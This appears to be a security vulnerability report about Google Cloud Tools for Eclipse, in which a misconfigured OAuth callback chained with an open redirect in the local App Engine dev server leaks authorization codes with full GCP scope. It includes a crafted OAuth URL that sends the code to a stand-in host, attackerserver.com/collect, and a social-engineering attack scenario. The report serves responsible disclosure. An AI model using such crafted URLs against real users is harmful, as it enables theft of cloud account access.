Summary:
Cloud Tools for Eclipse - Chaining misconfigured OAuth callback redirection with open redirect vulnerability to leak Google OAuth Tokens with full GCP Permissions
Product:
Google Cloud
URL:
https://accounts.google.com/o/oauth2/auth/oauthchooseaccount?client_id=572124029240-i0vhlk5ibeqbufl5e56ttdbs20ucj2k1.apps.googleusercontent.com&redirect_uri=http://localhost:8080/_ah/login?continue=http://attackerserver.com/collect&response_type=code&scope=email%20https://www.googleapis.com/auth/cloud-platform&service=lso&o2v=1&flowName=GeneralOAuthFlow
Vulnerability type:
Sensitive data exposure
Details
The "Google Cloud Tools for Eclipse plugin" uses a Google OAuth login flow to get authorized to access a user's GCP account. By chaining an insecure redirect/callback URL configuration with an open redirect vulnerability in the local appengine development server that the plugin creates, an attacker can abuse the user's trust in the plugin to steal their OAuth tokens.
The attack conditions are as follows:
The user has installed the Cloud Tools for Eclipse plugin as described
here
The user has created a starter appengine project in Eclipse following steps
The user has run the project as appengine as described
The attack steps are as follows:
Threat actor provides user with a Google OAuth authorization URL that has the trusted "Cloud Tools for Eclipse" branding and "
cloud-java-team@google.com
" developer info.  The URL has a maliciously crafted "redierct_uri" parameter value as follows:
User is presented with the "Cloud Tools for Eclipse wants to access your Google Account" page and grants the access.
Host at
accounts.google.com
responds with a redirect to the following location:
http://localhost:8080/_ah/login?continue=http://attackerserver.com/collect&code=REDACTED&scope=email%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/cloud-platform%20openid&authuser=2&prompt=consent
This redirected location (screenshot attached) is the sign-on page of the
built-in Users Service from the local appengine development server
Once user clicks on either of the "Log out" or "Log in" buttons, they are redirected to
http://attackerserver.com/collect
and the request contains a referrer header of the localhost:8080 origin containing the OAuth authorization code.
Attack scenario
As previously described, the attack can be performed by an external threat actor. The attack requires some user interaction but success is reasonably high if done via a social engineering campaign.
If successful, a threat actor is able to exfiltrate the victim's Google Authorization code which they can easily exchange for access and refresh tokens with permissions to perform all API actions against the victim's GCP account.